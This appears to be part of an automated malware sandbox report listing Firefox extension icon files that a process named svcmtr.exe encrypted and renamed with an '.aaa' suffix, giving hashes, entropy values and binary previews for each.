                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..9..x.....Y.[.q.u.......B...3..?Z....W.r. .!_.!.....-..s... ..Lw.....o..P...K..|H.e..'"7NSK...U....o!A....R...X........fX...y. .....v(.)..gh.h...=.].R..}Eux.M....cH.QB.D..}<..z.....q....u...Q.$|.LS..!.k.<qT!..\..Mv...y..Z...w.."f_K.z.e......h.....!........o..a.s.8.._.z..c........cXl..}'.........kv.tw.m.tX.........O.)0>.Wd.......\..t.q.4....ds..w>..6.3U.>.......t.Z.Sc...U(A....y8....X......'UHX|.3.....U....N.eN.~k.1$...[.p.....<.M5g.`..[l)...q8K5}. b.*.UD.}.......UNG.b.]U..v............\B..<bC.U.= ...=H2...[/t},...}*.*..r^.`V.W2.....t{.uyL#.v..%N0...BD...>DUE.a.S7.uK'.u6..x

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star4.svg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1278
                                                                                                                          Entropy (8bit):7.569370571349907
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S27VEBOIR2vGfpS/kWfgf012faOQrz3Uzf:c+9U40oDgpoxGxAk4gsPOqzEr
                                                                                                                          MD5:6EBFE340CAEFE01CAB6CEDE6A9286839
                                                                                                                          SHA1:D773F857E48D922F083BB7C8ABFEF7175138BE6D
                                                                                                                          SHA-256:4CEC4A1B91E72098C50CE37989C97D9EEC3C7E83E3BF797168421AE053465361
                                                                                                                          SHA-512:49DBE6E0846CCB7779E7E9827D12691E014885A44BE7A94AC0622704A1CED9A4F0BE49719E5614D1BD1B828DBF96FF3FF6E87E7FB2C74F77AD6B23E561A60C21
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....._.......)*).U...A...........#.xE3.....~.f...(..U~a|..aZ?W.DZ....0...S..C.~...F.....}..m...F.g.....:QF...mlV..E.c.G..,.-5.......9.~..x''n.XAjiP....?f~...?.`...O..j..m...(T..x..{..-<.M[D......_.=..q_5G....7....r @a.....f...^=..a8.a....&...U^QR....p.....*.5R.N(.f..rUG0.h._)...W.=..C.\...y...,...N..k.P ...e.....e#.V.s.3Q.M.$AN.0s.{j.:....Z...Q.G..-..x.A.8Dm.Z.7n.p.].|}2Z0.......Iy....:l.s..)..|./........".........v...g.:(..n!.....K.A6X...I.r.&.(....).JE..'.....*...!.I...hB}$.-JC1.l'..2..=..1.t.......S.....F....f.....8...o.S.L..j...T..ngP.OE..@w......![..t.W.Y..J..$..

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star_active.svg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1054
                                                                                                                          Entropy (8bit):7.445607031987796
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2GkrRulvSnb8QPB0VAz1Hqb4:c+9U40oDguRulvmJd
                                                                                                                          MD5:999FA04F770523B19591F15B3F23D52D
                                                                                                                          SHA1:E8E430EDB732E797EC1916E3A8FDDA940E6D6221
                                                                                                                          SHA-256:7DEF86268FF42AE79AB2D667CAE13A53B5B7D1909C6FAC20DC8D88D2C6820E48
                                                                                                                          SHA-512:2F439D3DE923311B16874FD6CC208A4445015921366E65685163C282F50AD15015F6E450FE1DF6F18AC23F1FB5BE2CBBBC06CE9BC0EC6102FA562826BAF6017C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..W^.$i.j.{]S<^5e.p...6..@r.ix:.|.,|C.2.t.#~z.Y.n....,y2R+}.r|HG...c8tzDh...r"..t.!.G.yq.d9....K..../..,.....Q 2wn.e0g..Y....R..*Q[AW...g{.b.P?.z...H.@..h./..YI.....M......l.{.....N..L..b...(..U..n.o...o~&....T?`Ma......).a.1......<.@.2..{.q<8.7....o..8...e.O....J/..B. .....<yU.q..H.Q$.h.1..P.o..i..>7...rV..j..X;.?.....'. ih.......'.h3.~W@.HNg......=..lIU.6")Y..."...QVE.o'........A.@B..W.$..z.....<..5..\?..UhnK...c ^...|..@&DF.*.$@y..c...4......(.:,.H....Fo.,....F...F.OO....).N...B.d........7...b3....IRg......5m...;6.....#<._@. ..rK.G.K......*!..L.Qi.............k_......7.=T..Wj.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\trophy.svg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1150
                                                                                                                          Entropy (8bit):7.525590156814136
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2f9nbcSYbBY18l+COyU5X03otj3GZWfkTgRC:c+9U40oDg49nr5phyBSyZWsTn
                                                                                                                          MD5:BDC97794EDD5B1772D2CEB2DC7DF5750
                                                                                                                          SHA1:FFF9F350F91AE298529F8EA7CA933EB4C7AED149
                                                                                                                          SHA-256:337F0418848F46258C01186A9E86A5D721AC820D9B6B6CD53ECCF549397033D3
                                                                                                                          SHA-512:33510588F61AB3FB2B89CC0AE585772754DA314647796CEB1309A0BBAB27201BCD70F90B8455F9FA9F503009421D096D482183DA9A74F2267F16C07A1D7111C6
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..,...G..|.z.>;............qI>.}{.%.|...8..j..(j.. E.......M..^.&dX.w...O^..y..T..Y..+M.)...I..9.]...z...8j...p...'.E......I..J8.Z:+..#.~.#.]-......|YP.`..}..q.Q..k.`..e....d..X.mV.4$..=..oN.....?...o.f.:./5mq.'.la....!....G.O...^=..2..&`W.....}!...'....@@."),NpgH/.?9^.Fy..x.(H..a.....t...*...8..$..I]......6C..p....G....|..g..:#.v...h..QEwx.p}..0..."T....j.t...$O.UG.....n0..].3....6.@6.v........Z...M...8_r0.pP.k....x..g.......(].wn.:..{...F. ..?.I..+P|A.b9.S..="...7._qs..%..0.2..........S..+^....b.w.+...iP,.vT.....c..2T]...l.........<2{]-...=...Z..3.PO..C"W.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\trophy_active.svg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2590
                                                                                                                          Entropy (8bit):7.870620535052442
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg4RgcD48YonE7lQW48cBBtWcSwANYn2c/ytQ0GjTCHY/9I5:cztoDLgc3hns48cRSJSn2RiHj2HYFC
                                                                                                                          MD5:259ECBFB896CD4FF062A0EE89EBAAF88
                                                                                                                          SHA1:972C8C9B58E68CCF6AE232C94BDAE9855E254039
                                                                                                                          SHA-256:15A14326CB0F013D3E3B2F98A4E152019AA1972779B2870A771A43EFA8C9338A
                                                                                                                          SHA-512:4AB438C6603FB1F7CC090BBF1184F3FC1C37BCE2ACEE3D6F7BC43673ADD9F7CB2BAED50EF36D07CE4784A9C3110D99267DE67FC1C10D40341A3BBC11BC6F69B2
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....h..[..........t.....np.z....`..1k.-o.~.....O.{......)............).[....?.........BI..5U_..E. D...%..Q..G...<..x.0..ph..XW...........o.....1.V/.......%C..........`.n+.;......VK.U..p....'.?...q...)..r..n.C....b..N.`.:..h$F..gP....V.n..8\$R.<..`I..WkN.....:yQ.yU..6..G..T..a$.>B=..i...X3..w..n....(.^<.....E.x.....Ur..q.WJ.=P..a..X>(.K.....C..=..~..A.e,..0.GQ..+...Wjk.W...X.y.p..m.H/.w..A..(y...>.8,y 0...V..q3... ....J....ug...|R....M..k...J./Q.V.)..UA......c;y..s.M.@.....y..q.u.o...cK...e...zW....3Y!.R....g.......~/...n.V..r.Y.k......d..i.{....H....`......z0.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet1_utility.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2302
                                                                                                                          Entropy (8bit):7.826419728627804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgiEkUCtA2MM68u42oaNDjLzwLVeHddrq9zVNuvk7Pc:cztoDB9Bn2JNTzwQHjmjuso
                                                                                                                          MD5:D3D62C72D54F23ABE7C8227EA1667C03
                                                                                                                          SHA1:DB8C07BC3E6DFF6407DF78CE1670370CB8BB5E3A
                                                                                                                          SHA-256:2FB614D86EE203C18B0EDF974BD4EE5D930667925CFCF08E0E1DA02D57644753
                                                                                                                          SHA-512:1B831BC9F1B4086B11884F45F1ACB5800B9ED3DB3E81F85CF5BDF49CE8C7EB0590934382BB813E84375F8DBCD33323D5621082BFD6061AAB3F984D70E851B035
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..e....N...<..7i.P...Jb7.H..B.o5...............P......^B.[.I..B..*.qw}..W:J..i...x...Cc..P...d..Fq.......g.+`";S.....4U....sHDb..sHE50..(...e..g.HBX.?.......F@'.....r.\.ll......x...|W.b.v[..).yWv.......Lq..T...re.G~........wlD..#....O../.TW..FP..3..B..f......a.s..To|.gS........:.E.Q......Y"h...i..;i......8U...HQe.`...E.uGLv...d.iDw.....1...X"lX.6..+....7.D....-..t..l.a.......=.<.].B..y}A...{.dG...];.......u@.Y...7LP.G..)...;T..4....kG.Q..T.^.C.l.N..-Z.........8..".yM.j..k. ....).[).r..5..i.\....p.s%.C.....8.e.......?..W."._K..uh.. _<v.....I..{<.......#.x.....ig....9n@

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet1_values.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1326
                                                                                                                          Entropy (8bit):7.632306020627354
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S20ol/SD89LwUsXZKZnqvC4Uauzp1Pc1iXktc8sL8:c+9U40oDgJD89LKXZKZ2Ya4YZL
                                                                                                                          MD5:692DBD5C5850433802A6A799053D6DD4
                                                                                                                          SHA1:B8EC234BDF74EFF7E51C98CCCE7FE1E66C65014D
                                                                                                                          SHA-256:8B5CB524F2FFF726E9031EE36A8D90C35F0ABF743943BC8B457D9798BD58E268
                                                                                                                          SHA-512:1199C7ADCCE8D35007A1D27B2043DFD6D16781B9623204D37802855366C3AFDC24F7BDD21B6F5AEE7D71A3891B5E8EEC2106CD5A96A3BFB7C2EBF3B40864D7D0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....}..3.(.%.E...........*....Ap......S......>...ee..Y..'.....c...QZ?..Q.h..Mf...y....=....a.R"....z.Q3...e..O2o{. ..O..............C^v......h.?.nM.......}j[y~...1\.&3...W...........w.0.gu.@f&..e...~...L......<....A..._.q`..].*.+.Q......IO<[#L0ja.,..Q...TJ.~.'..L.Z....VZ..s...+..wg.y..(...\.L.'./H4wI..............l..#......s/9Uk0.f..-'..!........K.K.e........},m.-&.Rb.l.71...As...q..5-.......].(H.........)ns.....$t...k@..j:.sj+.r........J..nn......IL"U.5.X.`...>S3......-.'-..........s.w$.m......j.M!R$.........J..5+...g.O.<...n|}]w..J.....sL..1.+..b.>......X...c..`y.t.b<..sh|

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet2_utility.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1070
                                                                                                                          Entropy (8bit):7.439829461309493
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2rNcKSz8AREnt0zmf105Hplv2jQ2:c+9U40oDgrKSOniHNYQ2
                                                                                                                          MD5:2719BA1B78902F26E74ED99A917C2C76
                                                                                                                          SHA1:59916636C02BBBC639C7B9E19766A63BFBBF96EA
                                                                                                                          SHA-256:777F5EA7ED4C2B28F24634A7ACDEBC531E69D9E1CF109A6703D61ED6E7A7941B
                                                                                                                          SHA-512:8C6B3C6159D532DCF81FD2AE8EF7A19139B571DCA8A4C28E4CD54D3399A3B3D70C288E1C4B188C55DCF069449100B5D132718C362D1D586B3F45AEAA8230A7A3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......B....o.......M....ja2.[4.@'.)..K.!......_e..A}w5..w@.5rc.L..L.B....^...aL.>.....:.0... .%...\%Q..G...(w...7.2.._..;..z......n......V6.G...kc.L.c.h....#U~.....f.Q.HW.....@=....^......&Iw).P$u.AE5...'..m?._.....X.K.L.<.YIs.8....|.......{.m..eqk/.s_...q+.:....Q....r.O!..@V..c.iW.u..;.....Y....tFb.A....".dB'..._M...:.....(C..'...@F.........9X..b..(.......D#b.|.fC.#ch.mS._...ew.P|.H;h.)..........M...>1e.(..x..?9..m.i)[....D.D....7....TF.. ^..b..1p........Yw7fQ....b6...&%+.F$Ox.J.).q..pOyU....1...O..^.P..+..(p1(..C..C.Q.F.E.B..o~.#.g....e...N.Vz.......-.o[\..S.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet2_values.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2526
                                                                                                                          Entropy (8bit):7.845814175974683
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgAwdm0owiej8XXk6MaeUXTpHVqCzVHiNVhDLjkGyrzwNxhuB:cztoDgdmoRj8XxMaeUzqGVHi/hHIVCxg
                                                                                                                          MD5:2475952EFF1B57B7538306162B3D17C6
                                                                                                                          SHA1:CFED4468ACD0CA441DC0E2480266D87282E76948
                                                                                                                          SHA-256:2C9133983967747C64B7C91A1EDF202EB40688E13DD116CA623E2B673E37E74B
                                                                                                                          SHA-512:DCE8FD29254F80C834F5F918E64A1D0287940BF626BCE7BF8363D1565726D09FC97682C1AB2BF643692F23E2806B1D6730D3865A81DB51B88ED663113BB78026
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......S.y.lw.....<....G.f.K.BF...,w.["..k...:.v......XW..<Y.C.g..y....)..Rt.<.hP...,.*..!.]...x..f........m.o....aX...G?..9....Vk[...X..........!>......c..aG.3...'.w...M.e.O5|% .!....R..,...{._.L....9./.....+.Z%.v..Z....)..b....IM...>A..sL..]...(.....>.i.M.t.T..L.W.q{^...!^c.../b..H..k."...P3Y...B.Q....z....!o..=....jK..(.!...;.....G....M..b.5.6E.....+.......W{.@......|..pk.V3.....}Y.U.O.r.P...."zk..R.;.%c.....0k....=.jW.*.T...y*1U}m..0...wU..[..<.X.~).j.!.U.2....3.W.].......4Ph..5...S Sj.T2h.;SH-.I....Ix:l.3.0.y.M.t...Lw8.q..\l.+..b.+.?..k4..m...g~F.{..:J..Y.:.Bs

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet3_utility.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2206
                                                                                                                          Entropy (8bit):7.811394082974455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg/lOJo9Ux6ZiLkyHNE4nemQiiSA0uQzDkoqqQLgp:cztoDJoK6ZiwQRe/idhlRLp
                                                                                                                          MD5:ED706464FBFDD3A0FAFAE99C6EBAE4A7
                                                                                                                          SHA1:3CBA12BBBDE44A14E0156F9017E1AA3A24AE093B
                                                                                                                          SHA-256:29DCBDC12E4F7328B1C12CBF1CA42FAACF76950ED6E151D233A2B65744B54097
                                                                                                                          SHA-512:8C8CC2B203265758890B33A20BB6502040CE8487CF12F7ED5AE5989E01A4BE78E7EA3B805DCAB36A9F637BD9DC5EF6196303FCF1BFD395E0415E06140D8C6BEB
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...h.X.g......9.....ys.!{xd!.}^?[..=.Y.D.......:.f7Ez...#=....d....T............B..k..>K..h;Tdz:...*t..C..0uV.t^.J.^.tl.u....I.!}.>!....O.C.....^............`z.T.(....$.K8s.. Y#".....q=...#.sh..oy....A...(cQ...%u5....m.39..(.....D...p..a.........,g.Qs..k.....A..Eg......L......$...}.R4.>.B... .V.l$.[.#...n...Y..^a........}=R.:.#..F..(R.(...o..<.>.M.5@"... ...|bY33.E.Zk....w......eF.%B.P......Q.....VT...;.O........r.d..n.'f...2._.._."9..C...r...}{.1*+.}....F..p..5.....Y.f.g..............;...f5..T..Z.u.\.Gm...s....Q.......db..f-.cv..q..._...Q.7....!.A..i....+.......

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet3_values.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3054
                                                                                                                          Entropy (8bit):7.882035769238676
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDghoKRLDQfckwMegx/K1tPxdXMsOIUJG90e1g7fEJr4DlEivHnYWySGfF:cztoDFKNGcL5XMsOIUJWnkEJr4DlJvHE
                                                                                                                          MD5:288089D43665B03B7959CC608CE96812
                                                                                                                          SHA1:4BAD023B9914A6396FF13A7D820B41C5C9BB307C
                                                                                                                          SHA-256:FB36814F65F4CD05AD8A76EDE901598C5D52EA27C0432D933B45306A8BEC1307
                                                                                                                          SHA-512:A21BC58BFA91309CDD0D945695EEB2C9108EB6AD78A749C30C134E1514EA6E703DBC6A5EBCFD1B67F8EE3291309221C636CBFBE129A9A5B1321280B785704F60
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..V..J.!V.2.R&..(II...#.|...<~c...0%.$..4I...2u.fez8E..".i.8]#.+.....?. .p.H\p.....N..T....gK..s.zd......B.^......./.M.^FR. ....J.PO..@.zS.1j*B'...*.f.h^W....?#9DH>..."......s.....DyV2...r@M.=......lz.f.d......i..""..+r...:p*MQu.|..=.".D..............%h2..P....Hl.3.r..=.........p..f2....m5W.........P.*.].t..8.4....4..R..v...'...K^.:Rr*4....'A......(.X0x ....XLb\...U&X`.+..[...1.....1.....g..o...:=..c..>(...X..q..z.7..UUg.u...K..m.....v..u...F,i........d.$...2..r...y.mA.]A)...TF\8r.zW.W.".9M:3:m.+<.`....r.4.u:.D..8.bB...Q.j.... ...R.i..+...u.....2`.A....4...?..

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet4_utility.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2398
                                                                                                                          Entropy (8bit):7.828955828099153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgsrA0DT48h5XWzYTwY7GTX4A/8F2F3qxF9sJtxpatfDV:cztoDb5485mY6TX40qxF9sJFat7V
                                                                                                                          MD5:C20BA25A277E3D9F2F9D964DD56E7D87
                                                                                                                          SHA1:50DF048E1C15682E64B50BFE2ABC477ECD373ECA
                                                                                                                          SHA-256:6F652679A8DCFE9889AC1E2DB7E392ED3F84B11F4013503B5D5729F59FBF68AE
                                                                                                                          SHA-512:D7D6A4B6B1A62D65E835BDB430791D9658830982FF212B4AF1F8B4E62E11BC9CFCFB7F2818C8AD10461E5BDEADA68A9C1833206CBD46D3E139FBB1F1BEC813BC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..............}.....Z5.n.C.....|=mi..Ld.@.N;.8.f.%j.Ai.2P..y...<..o.Ja.ab.-.kX,..9..Y.'.}.Z.....x.....l..G.w.$p....{.%. bS.5.......=..j....:....[..|.P*.51.....7.i.8..i..w,_...bI......O|....f.e....Q.J.&N.....Y.F....+._U.Mk....#m.X.DV qM..}j..3..3D....\~Xy.1..y.e....m.....6>.Z.u'HTD._.J..f.CJ.;....._`..o..o.X".R...1...(..:...^...M.......{.;M6..wq..WS.4......X......C.e...M&.{.......2.B4.{.P.....).....~m..o...S..;;.!....8B4...0n......u~ JG.=..Uj.sd&.....=...F...^qR.CO...K.4..:..I.K.h..E.]....H....r.&....?.....&...E.....?..{..p.....wM.....6Xn...G..c.M2.6.S....)..\...c.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet4_values.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1598
                                                                                                                          Entropy (8bit):7.672650237291229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgS06PPEszf+8yAdHUZ2bsJLJ0+:cztoDbRP8szfdyAy4sJLJd
                                                                                                                          MD5:6165F5FEB5DBC5DE57A8623A911C15E6
                                                                                                                          SHA1:DEE80FE2675BBEDA009F68F38F32EE84A9BE6644
                                                                                                                          SHA-256:3C20AC46B1C9E23D0871454838B49504564B0597F45342E8647A3C531CB3E730
                                                                                                                          SHA-512:F4FEF9FE32FD8C7895F4218B8EBDAC6B1171A58A8489A244A22316BB4DEBA2BFC487744E227443DCD1F36D2D6DD5A767F7637F99860C4DE210B277AFF3195978
                                                                                                                          Malicious:false
